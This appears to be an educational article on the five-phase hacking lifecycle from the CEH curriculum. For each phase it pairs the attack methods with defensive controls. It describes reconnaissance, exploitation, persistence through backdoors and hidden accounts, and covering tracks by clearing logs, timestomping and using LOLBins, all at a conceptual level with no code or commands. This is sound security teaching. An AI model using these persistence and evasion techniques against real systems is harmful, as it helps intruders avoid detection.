The framework every hacker follows
Whether it's a criminal group breaching a bank or a certified ethical hacker assessing a corporate network, the same five-phase model underpins every operation. This structured methodology is the foundation of EC-Council's CEH v13 curriculum and is used universally across the penetration testing industry to plan, execute, and report on security assessments.
Understanding the framework serves two purposes. Offensively, it provides a systematic approach to testing — ensuring no attack surface is missed. Defensively, it tells security teams exactly where to place controls: if you know which phase an attacker is in, you know which detection and prevention mechanisms should be firing.
The five phases are sequential but not strictly linear. A skilled attacker will loop back — new information discovered during scanning may trigger additional reconnaissance; maintaining access may reveal previously unknown lateral movement opportunities. The phases are a thinking framework, not a rigid checklist.
Phase 1: Reconnaissance
Reconnaissance is the foundation of every successful attack. Before a single packet is sent toward a target, skilled attackers invest significant time understanding it — its technology, its people, its suppliers, and its public-facing exposure.
Reconnaissance divides into two categories. Passive reconnaissance involves gathering intelligence without ever interacting with the target's systems, leaving no trace in their logs. Techniques include OSINT (Open Source Intelligence) from LinkedIn profiles, Shodan searches for exposed devices, Google dorking with operators like site:, filetype:, and inurl:, WHOIS and DNS lookups, job postings (a listing for a "Splunk Administrator" reveals the organisation's SIEM platform), and GitHub repository searches for leaked API keys or hardcoded credentials.
Active reconnaissance involves direct contact with target systems — ping sweeps, DNS zone transfer attempts, Nmap port scans, and banner grabbing to determine software versions. It is faster but detectable. Skilled attackers minimise active recon until they are confident passive methods have been exhausted. Common tools include Maltego for link analysis and relationship mapping, theHarvester for email and domain harvesting, and Recon-ng as a modular OSINT framework.
Reconnaissance typically consumes 60–70% of total attack planning time — a statistic that surprises defenders who assume most effort goes into exploitation.
The MGM Resorts 2023 breach started with a 10-minute LinkedIn search. Scattered Spider identified an IT help desk employee, impersonated them in a vishing call, and obtained credential resets — all from passive recon alone. That single intelligence-gathering step cost MGM $100M+.
Phase 2: Scanning & Enumeration
With a target profile established, the attacker moves to active scanning — directly probing systems to map what is reachable and what software is running on each endpoint. Nmap is the industry-standard tool for port scanning, revealing open ports, service versions, and operating system fingerprints. Nessus and OpenVAS take this further, correlating discovered services against CVE databases to identify known vulnerabilities with CVSS severity scores.
Enumeration goes deeper than scanning: it extracts actionable data from identified services — user account lists from LDAP, network shares via SMB, routing tables, SNMP community strings, and application version details. A useful way to frame the distinction: scanning finds the doors; enumeration looks through the keyholes. The output of this phase is a prioritised list of attack vectors for the next phase.
Phase 3: Gaining Access
This is the exploitation phase — where vulnerabilities identified during scanning are actively leveraged to breach a system. Methods include exploiting unpatched CVEs using frameworks like Metasploit, password spraying against authentication endpoints, spear phishing to deliver malware or capture credentials, SQL injection and other application-layer attacks, and chaining multiple low-severity misconfigurations that individually appear harmless.
The goal of this phase is not simply to enter a system — it is to reach a sensitive asset or achieve the stated objective of the engagement, while generating proof-of-concept evidence that demonstrates the vulnerability is genuinely exploitable rather than theoretical. In a penetration test, every action is timestamped and logged for the final report. In a criminal attack, speed and stealth take priority.
Privilege escalation often occurs here as well — an initial foothold may provide only limited user-level access, which the attacker then elevates to administrator or root by exploiting local vulnerabilities, misconfigurations, or weak credential practices.
Phase 4: Maintaining Access
A single point of entry is fragile. Sophisticated attackers — and red team operators in authorised engagements — establish persistent access mechanisms that survive reboots, password resets, and basic incident response activities. Techniques include installing backdoors and rootkits, creating hidden administrator accounts, setting up scheduled tasks or cron jobs that re-establish connectivity, and configuring Command and Control (C2) channels that blend outbound traffic with legitimate web activity.
This phase represents what threat hunters spend most of their time searching for. Dwell time — the period between initial compromise and detection — averaged 287 days in IBM's 2024 Cost of a Data Breach report. During that window, attackers map the internal network, exfiltrate data incrementally, and position themselves for the objective they were originally paid or motivated to achieve.
Phase 5: Covering Tracks
The final phase involves removing or obscuring evidence of the intrusion. Actions include clearing Windows Event Logs and Linux syslog entries, timestomping (modifying file metadata to make activity appear older or attribute it to a different time), using Living Off the Land Binaries (LOLBins) — legitimate system tools like PowerShell, certutil, and wmic — so that malicious activity looks indistinguishable from normal administrative work, and deleting command history and temporary files.
In authorised penetration tests, ethical hackers document every action they took and do not delete real logs — the evidence trail is part of the deliverable. Understanding this phase is critical for defenders: if an attacker successfully covers their tracks, the breach may never be discovered, or may only be identified months later through indirect indicators.
The defender's perspective at each phase
Every phase of the attack lifecycle has a corresponding defensive control. Understanding the attacker's methodology is what allows defenders to place those controls precisely where they will be most effective.
- Against Reconnaissance: Reduce your public footprint. Audit what information is publicly available about your organisation — remove unnecessary metadata from documents, restrict DNS zone transfers, consider private WHOIS registration, and run periodic OSINT assessments against your own domain.
- Against Scanning: Deploy IDS/IPS systems that detect and alert on port scan patterns. Rate-limit authentication endpoints and monitor for service enumeration attempts against internal systems.
- Against Exploitation: Patch management is the single most impactful control. Most successful exploitation targets known CVEs with available patches. Supplement with application firewalls and input validation for web-facing assets.
- Against Persistence: Threat hunting — proactively searching for indicators of compromise rather than waiting for alerts — is the primary defence against established persistence mechanisms. Endpoint Detection and Response (EDR) tools provide visibility into scheduled tasks, registry modifications, and unusual process activity.
- Against Covering Tracks: Immutable, centralised SIEM logs are essential. If log data is stored only on the endpoint being attacked, it can be cleared. Shipping logs in real-time to an independent SIEM means even a sophisticated attacker cannot erase the trail.